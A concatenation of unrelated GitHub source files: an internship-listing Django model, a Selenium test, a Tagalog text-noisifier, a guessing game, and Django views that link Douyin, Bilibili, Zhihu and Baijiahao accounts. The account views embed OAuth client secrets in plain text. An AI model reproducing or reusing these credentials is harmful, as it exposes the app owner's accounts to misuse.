models.CharField(choices=INTERN_WHERE, max_length=20)\n career = models.ForeignKey(\n 'Career', related_name='listings', blank=True, on_delete=models.CASCADE)\n new_career = models.CharField(blank=True, max_length=30)\n pay = models.CharField(blank=True, max_length=20)\n time_commitment = models.CharField(max_length=20)\n location = models.TextField(blank=True)\n application_deadline = models.DateTimeField()\n description = models.TextField()\n\n # students that have been accepted, rejected and requested\n # visible on the employer's account\n # needed in order to archive accepted/rejected student without affecting other accounts viewing the same field\n employer_acceptances = models.ManyToManyField(\n 'accounts.User', related_name='employer_acceptances', blank=True)\n employer_rejections = models.ManyToManyField(\n 'accounts.User', related_name='employer_rejections', blank=True)\n employer_interview_requests = models.ManyToManyField('accounts.User', related_name='employer_interview_requests',\n blank=True)\n\n # students that have been accepted, rejected and requested\n # visible on the student's account\n # needed in order to archive the students acceptance/rejection/request without affecting other accounts viewing the same field\n student_acceptances = models.ManyToManyField(\n 'accounts.User', related_name='student_acceptances', blank=True)\n student_rejections = models.ManyToManyField(\n 'accounts.User', related_name='student_rejections', blank=True)\n student_interview_requests = models.ManyToManyField('accounts.User', related_name='student_interview_requests',\n blank=True)\n\n # constant acceptances, rejections and requests\n # these are not viewed on any account\n # needed in order to create status updates\n acceptances = models.ManyToManyField(\n 'accounts.User', related_name='listing_acceptances', blank=True)\n rejections = models.ManyToManyField(\n 'accounts.User', related_name='listing_rejections', blank=True)\n interview_requests = models.ManyToManyField(\n 'accounts.User', related_name='interviews', blank=True)\n\n # if all of the above was one group of fields, users would be affected by another users actions so\n # the state of a users application is kept in an isolated group\n\n awaiting_confirm_acceptance = models.ManyToManyField(\n 'accounts.User', related_name='awaiting_confirm_acceptance', blank=True\n )\n applications = models.ManyToManyField(\n 'accounts.User', related_name='applications', blank=True)\n\n application_url = models.URLField(blank=True, null=True)\n posted = models.DateField(default=timezone.now, blank=True)\n slug = models.SlugField(max_length=50, unique=False, blank=True)\n\n already_applied = models.ManyToManyField(\n 'accounts.User', related_name='already_applied', blank=True)\n\n @property\n def summarize(self):\n data = {\n 'company': self.company,\n 'title': self.title,\n 'where': self.where,\n 'career': self.career,\n 'pay': self.pay,\n 'time_commitment': self.time_commitment,\n 'location': self.location,\n 'applications': [application for application in self.applications.all()],\n 'rejections': [rejection for rejection in self.rejections.all()],\n 'interview requests': [request for request in self.interview_requests.all()],\n 'application url': self.application_url,\n 'posted': self.posted,\n 'slug': self.slug\n }\n\n return data\n\n def get_absolute_url(self):\n return reverse('listing', kwargs={'slug': self.slug})\n\n def has_student_already_applied(self, student) -> bool:\n return student in self.already_applied.all()\n\n def apply(self, student):\n self.add_application(student)\n if not self.has_student_already_applied(student):\n self.already_applied.add(student)\n\n if self.company.notifications.unread().filter(actor_object_id=self.id).filter(action_object_object_id=student.id).count() != 0:\n return\n\n notify.send(recipient=self.company, verb='someone applied!',\n actor=self, sender=self, action_object=student)\n\n def unapply(self, student):\n self.remove_application(student)\n if student in self.interview_requests.all():\n self.interview_requests.remove(student)\n if student in self.student_interview_requests.all():\n self.student_interview_requests.remove(student)\n if student in self.employer_interview_requests.all():\n self.employer_interview_requests.remove(student)\n\n def add_application(self, student):\n self.applications.add(student)\n\n def remove_application(self, student):\n self.applications.remove(student)\n\n def archive_student_acceptance(self, student):\n self.student_acceptances.remove(student)\n\n def archive_student_rejection(self, student):\n self.student_rejections.remove(student)\n\n def archive_interview_request(self, student):\n self.student_interview_requests.remove(student)\n\n def check_if_accepted(self, user):\n return user in self.awaiting_confirm_acceptance.all()\n\n def remove_from_interview(self, student):\n if student in self.interview_requests.all():\n self.interview_requests.remove(student)\n if student in self.student_interview_requests.all():\n self.student_interview_requests.remove(student)\n if student in self.employer_interview_requests.all():\n self.employer_interview_requests.remove(student)\n\n def decline_acceptance(self, student):\n self.awaiting_confirm_acceptance.remove(student)\n\n def confirm_acceptance(self, student):\n for listing in student.applications.all():\n listing.remove_application(student)\n\n for listing in student.awaiting_confirm_acceptance.all():\n listing.awaiting_confirm_acceptance.remove(student)\n\n self.awaiting_confirm_acceptance.remove(student)\n self.acceptances.add(student)\n self.employer_acceptances.add(student)\n self.student_acceptances.add(student)\n\n def accept(self, student):\n self.applications.remove(student)\n self.awaiting_confirm_acceptance.add(student)\n self.remove_from_interview(student)\n\n def reject(self, student):\n\n self.applications.remove(student)\n self.rejections.add(student)\n self.employer_rejections.add(student)\n self.student_rejections.add(student)\n\n self.remove_from_interview(student)\n\n def request_interview(self, student):\n self.interview_requests.add(student)\n self.employer_interview_requests.add(student)\n self.student_interview_requests.add(student)\n\n def __str__(self):\n return self.title\n\n\nclass Career(models.Model):\n career = models.CharField(max_length=30)\n\n def __str__(self):\n return self.career\n","repo_name":"christianstefaniw/interniac-website","sub_path":"marketplace/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"83"} +{"seq_id":"20183580531","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium import webdriver\nimport time\n\n\nlink = \"https://anflat.ru/\"\nbrowser = webdriver.Chrome()\nbrowser.maximize_window()\nurl = browser.current_url\nbrowser.get(link)\n#Селекторы:\nmainH1 = browser.find_element(By.CSS_SELECTOR, \"h1 div\")\nmainH1Text = mainH1.text\nprint(mainH1Text)\nexpectedH1Text = \"Купить квартиру в Казани - подбор объектов\"\n#Функция для проверки\ndef test_input_text(expected_result, actual_result):\n if actual_result == expected_result:\n return print(\"Done\")\n assert test_input_text(expectedH1Text, mainH1Text) == 'Done'\n\n\ntime.sleep(2)\ntest_input_text(expectedH1Text, mainH1Text)","repo_name":"Khamatov/Stepik2","sub_path":"module3/test_anflatFX1.py","file_name":"test_anflatFX1.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25696103458","text":"\"\"\"This module handles all noisy text generation.\"\"\"\nimport re\nimport random\nfrom pprint import pprint\nimport nltk.tokenize as tokenizer\nfrom .hyphenator import Hyphenator\n\n\nclass TextNoisifier:\n \"\"\"Handles all text noisification rules.\"\"\"\n\n def __init__(self,\n accent_words_dict,\n phonetic_subwords_dict,\n phonetic_words_dict,\n hyphenator_dict):\n \"\"\"Initialize all dictionaries and Regex for string manipulation.\"\"\"\n self.accent_words_dict = accent_words_dict\n\n self.phonetic_words_dict = phonetic_words_dict\n self.phonetic_subwords_dict = phonetic_subwords_dict\n\n self.re_adj_vowels = re.compile(r'[aeiou]{2,}', re.IGNORECASE)\n self.re_accepted = re.compile(r\"\\b[\\sA-Za-z'-]+\\b\")\n self.re_hyphens = re.compile(r'(-)')\n\n self.vowels = 'aeiou'\n self.lower_vowels = self.vowels\n self.upper_vowels = self.vowels.upper()\n self.vowels += self.upper_vowels\n\n self.consonants = \"bcdfghjklmnpqrstvwxyz\"\n self.lower_consonants = self.consonants\n self.upper_consonants = self.consonants.upper()\n self.consonants += self.upper_consonants\n\n self.alphabet = self.vowels + self.consonants\n self.lower_alphabet = ''.join(list(set(self.alphabet.lower())))\n self.upper_alphabet = ''.join(list(set(self.alphabet.upper())))\n\n matches = re.findall(r\"{(.*?)\\}\",\n hyphenator_dict,\n re.MULTILINE | re.DOTALL)\n\n patterns = matches[0]\n exceptions = matches[1]\n self.hyphenator = Hyphenator(patterns, exceptions)\n\n self.mwes = []\n for k, v in accent_words_dict.items():\n words = k.split()\n if len(words) > 1:\n self.mwes.append(tuple(words))\n words[0] = words[0].capitalize()\n self.mwes.append(tuple(words))\n\n print(\"============= Multi-word Expressions =================\")\n pprint(self.mwes)\n\n self.mwe_tokenizer = tokenizer.MWETokenizer(self.mwes, separator=' ')\n\n self.expand_pattern = re.compile(r\"(\\w+[aeiou])'([yt])\", re.IGNORECASE)\n self.expand_repl = r'\\1 a\\2'\n\n self.contract_pattern = re.compile(r'(\\w+[aeiou])\\s\\ba([ty]\\b)',\n re.IGNORECASE)\n self.contract_repl = r\"\\1'\\2\"\n # FIXME: Has the tendency to normalize words like \"Antipolo\", \"Antik\"\n self.text_patterns = [\n # Ang baho -> Ambaho\n (re.compile(r'(\\b[aA])(ng\\s)(\\b[bp]\\w+\\b)'), r'\\1m\\3'),\n # Ang dami -> Andami\n (re.compile(r'(\\b[aA]n)(g\\s)(\\b[gkhsldt]\\w+\\b)'), r'\\1\\3'),\n # Ano ba -> Anuba\n (re.compile(r'(\\b[aA]n)(os)(\\b\\w{2}\\b)'), r'\\1u\\3'),\n # Pagkain -> Pag kain\n (re.compile(r'(pag)(\\w+)'), r'\\1 \\2'),\n # na naman -> nanaman\n (re.compile(r'(\\b(ka|pa|na|di)\\b)\\s(\\b[A-Za-z]{,2}\\b)',\n re.IGNORECASE), r'\\1\\3')\n ]\n\n \"\"\"\n >>> nang\n Replacement for 'noong'.\n Sagot sa paano o gaano.\n Pang-angkop sa pandiwang inuulit (Tulog ka nang tulog)\n Kung pinagsamang 'na' at 'ang', 'na' at 'ng', o ng 'na' at 'na'\n\n >>> ng\n Pantukoy ng pangalan\n Pagpapahiwatig ng pagmamay-ari\n \"\"\"\n self.ng2nang_pattern = re.compile(r'\\bng\\b')\n self.ng2nang_repl = r'nang'\n self.nang2ng_pattern = re.compile(r'r\\bnang\\b')\n self.nang2ng_repl = r'ng'\n\n self.raw_daw = \\\n re.compile(r'\\b([^aeiou]|[aeiou])\\b\\s([dr])(aw|ito|oon|in)',\n re.IGNORECASE)\n self.vocabulary = None\n\n def ng2nang(self, text):\n return self.ng2nang_pattern.sub(self.ng2nang_repl, text)\n\n def nang2ng(self, text):\n return self.nang2ng_pattern.sub(self.nang2ng_repl, text)\n\n def contract_expr(self, text):\n return self.contract_pattern.sub(self.contract_repl, text)\n\n @staticmethod\n def _format(match, repl):\n return \"{} {}{}\".format(\n match.group(1),\n repl if match.group(2).islower() else repl.upper(),\n match.group(3))\n\n def raw_daw_repl(self, match):\n \"\"\"Misuse raw and daw in sentence.\"\"\"\n if match.group(1) in self.vowels:\n return self._format(match, 'd') # raw\n elif match.group(1) in self.consonants:\n return self._format(match, 'r') # daw\n\n def remove_vowels(self, word):\n \"\"\"Remove vowels randomly from a word.\"\"\"\n vowel_sample = random.sample(self.vowels,\n random.randrange(len(self.vowels)))\n remove_vowel_rule = str.maketrans(dict.fromkeys(vowel_sample,\n None))\n if len(word) == 4 and word[0] in self.vowels:\n if random.getrandbits(1):\n return word[1:]\n if not self.re_adj_vowels.search(word) and len(word) > 3:\n w_len = len(word)\n center = w_len // 2\n if random.getrandbits(1):\n if random.getrandbits(1): # left\n word = word[0] \\\n + word[1:center].translate(remove_vowel_rule) \\\n + word[center:]\n if random.getrandbits(1): # middle\n start = center // 2\n end = center + start\n word = word[:start] \\\n + word[start:end].translate(remove_vowel_rule) \\\n + word[end:]\n if random.getrandbits(1): # right\n word = word[:center] \\\n + word[center:w_len-1].translate(remove_vowel_rule) \\\n + word[-1]\n else: # all\n word = word[0] \\\n + word[1:-1].translate(remove_vowel_rule) \\\n + word[-1]\n elif len(word) == 2 and word[-1] in self.vowels:\n word = word[0]\n return word\n\n def remove_all_vowels(self, word):\n remove_vowel_rule = str.maketrans(dict.fromkeys(self.vowels,\n None))\n if len(word) == 4 and word[0] in self.vowels and random.getrandbits(1):\n word = word[1:]\n elif not self.re_adj_vowels.search(word) and len(word) > 3:\n word = word[0] \\\n + word[1:-1].translate(remove_vowel_rule) \\\n + word[-1]\n elif len(word) == 2 and word[-1] in self.vowels:\n word = word[0]\n return word\n\n def repeat_characters(self, word):\n \"\"\"Repeat characters from left or right portion of the word.\"\"\"\n letter = random.choice(self.alphabet)\n length = random.randrange(2, 10)\n if random.getrandbits(1):\n word = word.replace(letter, letter * length, 1)\n else:\n word = word[::-1].replace(letter, letter * length, 1)[::-1]\n return word\n\n def misspell(self, word):\n \"\"\"Replace/Delete/Insert a character in a word to misspell.\"\"\"\n if random.getrandbits(1):\n word = self._one_char_edit(word)\n else:\n word = self._two_char_edit(word)\n return word\n\n def _one_char_edit(self, word):\n edit = random.choice(['del', 'ins', 'rep', 'tra'])\n idx = random.randrange(len(word) + 1)\n letter = random.choice(self.lower_alphabet)\n\n lsplit, rsplit = word[:idx], word[idx:]\n if edit == 'del' and rsplit:\n word = lsplit + rsplit[1:]\n elif edit == 'tra' and len(rsplit) > 1:\n word = lsplit + rsplit[1] + rsplit[0] + rsplit[2:]\n elif edit == 'rep':\n word = lsplit + letter + rsplit[1:]\n elif edit == 'ins':\n word = lsplit + letter + rsplit\n return word\n\n def _two_char_edit(self, word):\n return self._one_char_edit(self._one_char_edit(word))\n\n def phonetic_style_subwords(self, word):\n \"\"\"Return a phonetically styled portion of a word.\"\"\"\n return self._subword_substitution(word, self.phonetic_subwords_dict)\n\n def phonetic_style_words(self, word):\n \"\"\"Return a phonetically styled word.\"\"\"\n return self._word_substitution(word, self.phonetic_words_dict)\n\n @staticmethod\n def _word_substitution(word, substitution_dict):\n \"\"\"Find the substitute in the text and replace.\"\"\"\n is_upper = word[0].isupper()\n is_allcaps = str.isupper(word)\n\n word = word.lower()\n v = substitution_dict.get(word, word)\n repl = random.choice(v) if isinstance(v, list) else v\n word = word.replace(word, repl)\n word = word.replace(\"'\", '')\n if is_upper:\n word = word.capitalize()\n if is_allcaps:\n word = word.upper()\n return word\n\n @staticmethod\n def _subword_substitution(word, substitution_dict):\n for k, v in substitution_dict.items():\n try:\n is_upper = word[0].isupper()\n is_allcaps = str.isupper(word)\n except IndexError:\n continue\n word = word.lower()\n repl = random.choice(v) if isinstance(v, list) else v\n word = word.replace(k, repl)\n if random.getrandbits(1):\n word = word.replace(\"'\", '')\n if is_upper:\n word = word.capitalize()\n if is_allcaps:\n word = word.upper()\n return word\n\n def phonetic_style(self, text):\n \"\"\"Phonetic style for the word.\"\"\"\n result = self.phonetic_style_words(text)\n return self.phonetic_style_subwords(result)\n\n def accent_style(self, text):\n \"\"\"Accent style a word.\"\"\"\n return self._word_substitution(text, self.accent_words_dict)\n\n def group_repeating_units(self, word):\n \"\"\"Group repeating units by grouping the syllables.\"\"\"\n hyphenated_words = self.re_hyphens.split(word)\n if len(hyphenated_words) > 1:\n if hyphenated_words[0].lower().find(hyphenated_words[2]) != -1:\n end = len(hyphenated_words[0])\n word = hyphenated_words[0][:end] \\\n + '2' + hyphenated_words[2][end:]\n elif hyphenated_words[2].find(hyphenated_words[0].lower()) != -1:\n end = len(hyphenated_words[0])\n word = hyphenated_words[0][:end] \\\n + '2' + hyphenated_words[2][end:]\n\n word = self.group_units(self.hyphenator.hyphenate_word(word))\n return word\n\n @staticmethod\n def group_units(units):\n \"\"\"Group syllables with the no. of occurrences.\"\"\"\n for i in range(len(units) - 1):\n if units[i] != '' and units[i].lower() == units[i + 1].lower():\n units[i + 1] = str(2)\n elif units[i] != '' and units[i].lower() \\\n == units[i + 1][:-(len(units[i]))].lower():\n units[i + 1] = str(2) + units[i + 1][(len(units[i])):]\n return ''.join(units)\n\n def noisify(self, word, sos=False, with_tag=False):\n \"\"\"Randomly apply string manipulation.\n\n It only accepts alphabet, apostrophe and hyphen.\n The string length must be greater than 1.\n It doesn't accept capital letters, hacky way to avoid named-entity to be noisified.\n\n \"\"\"\n if self.re_accepted.search(word) \\\n and len(word) > 1 \\\n and (sos or word[0].islower()):\n\n # accented = self.accent_style(word)\n # if accented != word:\n # word = accented.replace('-', '')\n # return (word, 'accent_styles') if with_tag else word\n\n # phonetically_styled = self.phonetic_style(word)\n # if phonetically_styled != word:\n # word = phonetically_styled.replace('-', '')\n # return (word, 'phonetic_styles') if with_tag else word\n\n grouped_units = self.group_repeating_units(word)\n if grouped_units != word:\n word = grouped_units.replace('-', '')\n return (word, 'repeating_units') if with_tag else word\n\n value = random.random()\n selected = ''\n if value > 0.80:\n selected = 'repeating_characters'\n elif value > 0.50:\n selected = 'contractions'\n else:\n selected = 'misspellings'\n noisified = self.dispatch_rules(selected, word)\n if with_tag:\n if noisified != word and not self.vocabulary.get(noisified):\n word = word.replace('-', '')\n word = (noisified, selected)\n else:\n word = word.replace('-', '')\n word = (word, None)\n else:\n word = noisified\n word = word.replace('-', '')\n else:\n word = (word, None) if with_tag else word\n return word\n\n def noisify2(self, word, sos=False, with_tag=False):\n \"\"\"Randomly apply string manipulation.\n\n It only accepts alphabet, apostrophe and hyphen.\n The string length must be greater than 1.\n It doesn't accept capital letters, hacky way to avoid named-entity to be noisified.\n\n \"\"\"\n if self.re_accepted.search(word) \\\n and len(word) > 1 \\\n and (sos or word[0].islower()):\n value = random.random()\n selected = ''\n if value > 0.80:\n selected = 'repeating_characters'\n elif value > 0.50:\n selected = 'contractions'\n else:\n selected = 'misspellings'\n noisified = self.dispatch_rules(selected, word)\n if with_tag:\n if noisified != word:\n word = word.replace('-', '')\n word = (noisified, selected)\n else:\n word = word.replace('-', '')\n word = (word, None)\n else:\n word = noisified\n word = word.replace('-', '')\n else:\n word = (word, None) if with_tag else word\n return word\n\n def dispatch_rules(self, rule, word):\n \"\"\"Text noisifier dispatcher.\"\"\"\n return {\n 'contractions': self.remove_vowels(word),\n 'phonetic_style': self.phonetic_style(word),\n 'misspellings': self.misspell(word),\n 'accent_styles': self.accent_style(word),\n 'repeating_characters': self.repeat_characters(word),\n 'repeating_units': self.group_repeating_units(word)\n }.get(rule, word)\n","repo_name":"ryangmolina/text-normalizer","sub_path":"training/data/textnoisifier.py","file_name":"textnoisifier.py","file_ext":"py","file_size_in_byte":14781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5491134094","text":"from random import randint #importação da biblioteca randint/random\n\ndef numberGame(): \n number = randint(1,100)#escolher um numero aleatorio entre 1 e 100 \n #exibe para o usuário\n print(\"Eu estou pensando em um número entre 1 e 100.\")\n palpite = int(input(\"Qual o seu palpite? \"))\n #condicionais, que comparam o numero escolhido aleatoriamente e o que palpite\n if (number==palpite):\n print(\"É isso mesmo, esse é o número \\0/\")\n elif(number>palpite):\n print(\"Poxa...:/. É um pouco maior\")\n else:\n print(\"Poxa, é um pouco menor :/\")\n #print(number)\nnumberGame() #chamada da função\n\n \n","repo_name":"iasminimp/pic_python","sub_path":"Codigos pt.3/code11.py","file_name":"code11.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27056291285","text":"import asyncio\nimport time\nfrom datetime import datetime, timedelta\nfrom urllib import parse\n\nimport requests\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect, HttpResponse\nfrom django.utils import timezone\nfrom django.db.models import Q, Sum\nfrom asgiref.sync import sync_to_async, async_to_sync\n\nfrom mainsite import models\nfrom mainsite.utils.get_data import GetData\n\n\ndef account_auth_list(request):\n \"\"\"账号授权列表\"\"\"\n\n # 前端选中标签与头部标签\n active_account_auth = \"\"\n header_label = \"\"\n if request.path == \"/account/auth/list/\":\n active_account_auth = \"active\"\n header_label = \"授权管理\"\n\n # 抖音授权\n client_key = \"awpswfd65m22r59e\" # 应用唯一标识\n response_type = \"code\" # 默认值 code\n scope = \"user_info,data.external.user,video.list.bind,video.data.bind,renew_refresh_token,data.external.item,data.external.billboard_hot_video\" # 应用授权作用域\n # optionalScope = \"user_info,1,data.external.user,1\" # 应用授权可选作用域&optionalScope={optionalScope}\n redirect_uri = \"https://www.baidu.com\" # 授权成功后的回调地址\n get_accredit_url = f\"https://open.douyin.com/platform/oauth/connect?client_key={client_key}&response_type={response_type}&scope={scope}&redirect_uri={redirect_uri}\"\n\n context = {\n \"now\": timezone.now(), # 当前时间\n \"get_accredit_url\": get_accredit_url, # 抖音授权地址\n \"active_account_auth\": active_account_auth,\n \"header_label\": header_label,\n }\n\n return render(request, \"account_auth_list.html\", context)\n\n\ndef account_auth_zhihu(request):\n \"\"\"账号授权知乎\"\"\"\n\n # 获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n if request.method == \"POST\":\n z_c0 = request.POST.get(\"z_c0\")\n if z_c0:\n cookies = {\"z_c0\": z_c0}\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15\"\n }\n url = \"https://www.zhihu.com/api/v4/me\"\n response = requests.get(url, headers=headers, cookies=cookies)\n user_info = response.json()\n nickname = user_info.get(\"name\")\n avatar = user_info.get(\"avatar_url\")\n auth_time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n expires_time = (datetime.now() + timedelta(days=180)).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n )\n zh_uid = user_info.get(\"id\")\n user_info_dict = {\n \"uid_id\": uid,\n \"nickname\": nickname,\n \"avatar\": avatar,\n \"auth_time\": auth_time,\n \"expires_time\": expires_time,\n \"z_c0\": z_c0,\n }\n exists = models.PlatFormZhiHu.objects.filter(zh_uid=zh_uid).exists()\n if exists:\n models.PlatFormZhiHu.objects.filter(zh_uid=zh_uid).update(\n **user_info_dict\n )\n else:\n user_info_dict[\"zh_uid\"] = zh_uid\n models.PlatFormZhiHu.objects.create(**user_info_dict)\n\n return redirect(\"/account/auth/list/\")\n\n\ndef account_auth_douyin(request):\n \"\"\"账号授权抖音\"\"\"\n\n # 获取当前登陆的用户uid\n data_dict = {\"uid\": request.session.get(\"info\").get(\"uid\")}\n\n # 获取用户授权信息\n if request.method == \"POST\":\n # 获取扫码后重定向的query参数\n redict_parse = request.POST.get(\"redict_parse\")\n if redict_parse:\n url = parse.urlparse(redict_parse)\n query_dict = parse.parse_qs(url.query)\n code_option = query_dict.get(\"code\")\n if code_option:\n code = code_option[0]\n # 获取(access_token, open_id, refresh_token)\n access_token_url = \"https://open.douyin.com/oauth/access_token/\"\n access_token_json = {\n \"grant_type\": \"authorization_code\",\n \"client_key\": \"awpswfd65m22r59e\",\n \"client_secret\": \"f801426192c924f33d6f67d702ba0099\",\n \"code\": code,\n }\n access_token_header = {\"Content-Type\": \"application/json\"}\n access_token_responses = requests.post(\n url=access_token_url,\n json=access_token_json,\n headers=access_token_header,\n )\n access_token_responses_responses_data = access_token_responses.json()\n\n access_token = access_token_responses_responses_data[\"data\"][\n \"access_token\"\n ]\n open_id = access_token_responses_responses_data[\"data\"][\"open_id\"]\n refresh_token = access_token_responses_responses_data[\"data\"][\n \"refresh_token\"\n ]\n expires_in = access_token_responses_responses_data[\"data\"][\"expires_in\"]\n\n # 获取用户基本信息()\n user_open_info_url = \"https://open.douyin.com/oauth/userinfo/\"\n user_open_info_json = {\"access_token\": access_token, \"open_id\": open_id}\n user_open_info_header = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n user_open_info_responses = requests.post(\n url=user_open_info_url,\n data=user_open_info_json,\n headers=user_open_info_header,\n )\n user_open_info_responses_data = user_open_info_responses.json()\n\n nickname = user_open_info_responses_data[\"data\"][\"nickname\"]\n avatar = user_open_info_responses_data[\"data\"][\"avatar\"]\n e_account_role = user_open_info_responses_data[\"data\"][\"e_account_role\"]\n\n # 用户基本参数\n # 将时间转成datetime类型\n expires_time = datetime.now() + timedelta(seconds=expires_in)\n expires_time = datetime.strftime(expires_time, \"%Y-%m-%d %H:%M:%S\")\n auth_time = datetime.now()\n auth_time = datetime.strftime(auth_time, \"%Y-%m-%d %H:%M:%S\")\n e_account_role_identify = e_account_role if e_account_role else \"None\"\n user_info_dict = {\n \"uid_id\": data_dict.get(\"uid\"),\n \"nickname\": nickname,\n \"access_token\": access_token,\n \"refresh_token\": refresh_token,\n \"avatar\": avatar,\n \"e_account_role\": e_account_role_identify,\n \"expires_in\": expires_time,\n \"auth_time\": auth_time,\n }\n\n # 判断账号是否存在\n exists = models.PlatFormDouYin.objects.filter(open_id=open_id).exists()\n if exists:\n models.PlatFormDouYin.objects.filter(open_id=open_id).update(\n **user_info_dict\n )\n else:\n user_info_dict[\"open_id\"] = open_id\n models.PlatFormDouYin.objects.create(**user_info_dict)\n\n return redirect(\"/account/auth/list/\")\n\n\ndef account_auth_bilibili(request):\n \"\"\"账号授权 Bilibili\"\"\"\n\n # 获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n # 获取用户授权信息\n if request.method == \"POST\":\n # 获取扫码后重定向的query参数\n return_url = request.POST.get(\"return_url\")\n if return_url:\n url = parse.urlparse(return_url)\n query_dict = parse.parse_qs(url.query)\n code_option = query_dict.get(\"code\")\n if code_option:\n code = code_option[0]\n access_token_url = \"https://api.bilibili.com/x/account-oauth2/v1/token\"\n access_token_json = {\n \"client_id\": \"302763bae0404eee\",\n \"client_secret\": \"aef73864a09a42bcbe1bbec8130ee5ed\",\n \"grant_type\": \"authorization_code\",\n \"code\": code,\n }\n access_token_response = requests.post(\n url=access_token_url, json=access_token_json\n )\n access_token_result = access_token_response.json()\n if access_token_result.get(\"code\") == 0:\n data = access_token_result.get(\"data\")\n access_token = data.get(\"access_token\", \"\")\n expires_in = data.get(\"expires_in\", \"\")\n refresh_token = data.get(\"refresh_token\", \"\")\n\n # 获取用户信息\n user_info_url = (\n \"https://member.bilibili.com/arcopen/fn/user/account/info\"\n )\n user_info_param = {\n \"client_id\": \"302763bae0404eee\",\n \"access_token\": access_token,\n }\n user_info_response = requests.get(\n url=user_info_url, params=user_info_param\n )\n user_info_result = user_info_response.json()\n if user_info_result.get(\"code\") == 0:\n data = user_info_result.get(\"data\")\n nickname = data.get(\"name\", \"\")\n avatar = data.get(\"face\", \"\")\n openid = data.get(\"openid\", \"\")\n\n time_object = datetime.utcfromtimestamp(expires_in)\n expires_time = time_object.strftime(\"%Y-%m-%d %H:%M:%S\")\n auth_time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n row_object = {\n \"access_token\": access_token,\n \"refresh_token\": refresh_token,\n \"nickname\": nickname,\n \"avatar\": avatar,\n \"expires_in\": expires_time,\n \"auth_time\": auth_time,\n \"uid_id\": uid,\n }\n\n exists = models.PlatFormBilibili.objects.filter(\n openid=openid\n ).exists()\n if exists:\n models.PlatFormBilibili.objects.filter(\n openid=openid\n ).update(**row_object)\n else:\n row_object[\"openid\"] = openid\n models.PlatFormBilibili.objects.create(**row_object)\n\n else:\n mes = user_info_result.get(\"message\")\n print(mes)\n\n else:\n mes = access_token_result.get(\"message\")\n print(mes)\n\n return redirect(\"/account/auth/list/\")\n\n\ndef account_auth_baijiahao(request):\n \"\"\"账号授权百家号\"\"\"\n\n # 获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n if request.method == \"POST\":\n bduss = request.POST.get(\"bduss\")\n token = request.POST.get(\"token\")\n bjhstoken = request.POST.get(\"bjhstoken\")\n cookies = {\"BDUSS\": bduss}\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15\",\n \"token\": token,\n }\n response = requests.get(\n \"https://baijiahao.baidu.com/builder/app/appinfo\",\n cookies=cookies,\n headers=headers,\n )\n result = response.json()\n errno = result.get(\"errno\")\n if errno != 0:\n return HttpResponse(\"BDUSS 或 token 错误\")\n nickname = result[\"data\"][\"user\"][\"name\"]\n avatar = result[\"data\"][\"user\"][\"avatar\"].replace(\"//\", \"https://\")\n auth_time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n expires_time = (datetime.now() + timedelta(days=60)).strftime(\n \"%Y-%m-%d %H:%M:%S\"\n )\n app_id = result[\"data\"][\"user\"][\"app_id\"]\n\n user_info_dict = {\n \"nickname\": nickname,\n \"avatar\": avatar,\n \"expires_time\": expires_time,\n \"auth_time\": auth_time,\n \"uid_id\": uid,\n \"bduss\": bduss,\n \"token\": token,\n \"bjhstoken\": bjhstoken,\n }\n exists = models.PlatFormBaiJiaHao.objects.filter(app_id=app_id).exists()\n if exists:\n models.PlatFormBaiJiaHao.objects.filter(app_id=app_id).update(\n **user_info_dict\n )\n else:\n user_info_dict[\"app_id\"] = app_id\n models.PlatFormBaiJiaHao.objects.create(**user_info_dict)\n\n return redirect(\"/account/auth/list/\")\n\n\ndef account_auth_get(request):\n \"\"\"获取授权账号表格数据\"\"\"\n\n # 获取当前登陆的用户uid\n uid = request.session.get(\"info\").get(\"uid\")\n\n row_id = 0\n data = {\"total\": 0, \"rows\": []}\n\n queryset_dy = models.PlatFormDouYin.objects.filter(uid=uid)\n for index, item in enumerate(queryset_dy):\n data[\"total\"] += index\n row_id += 1\n content = {\n \"id\": row_id,\n \"platform\": \"抖音\",\n \"nickname\": item.nickname,\n \"avatar\": item.avatar,\n \"auth_time\": item.auth_time,\n \"expires_time\": item.expires_in,\n \"status\": item.expires_in > datetime.now(),\n \"open_id\": item.open_id,\n }\n\n data[\"rows\"].append(content)\n\n queryset_bz = models.PlatFormBilibili.objects.filter(uid=uid)\n for index, item in enumerate(queryset_bz):\n data[\"total\"] += index\n row_id += 1\n content = {\n \"id\": row_id,\n \"platform\": \"哔哩哔哩\",\n \"nickname\": item.nickname,\n \"avatar\": item.avatar,\n \"auth_time\": item.auth_time,\n \"expires_time\": item.expires_in,\n \"status\": item.expires_in > datetime.now(),\n \"openid\": item.openid,\n }\n\n data[\"rows\"].append(content)\n\n queryset_zh = models.PlatFormZhiHu.objects.filter(uid=uid)\n for index, item in enumerate(queryset_zh):\n data[\"total\"] += index\n row_id += 1\n\n content = {\n \"id\": row_id,\n \"platform\": \"知乎\",\n \"nickname\": item.nickname,\n \"avatar\": item.avatar,\n \"auth_time\": item.auth_time,\n \"expires_time\": item.expires_time,\n \"status\": item.expires_time > datetime.now(),\n 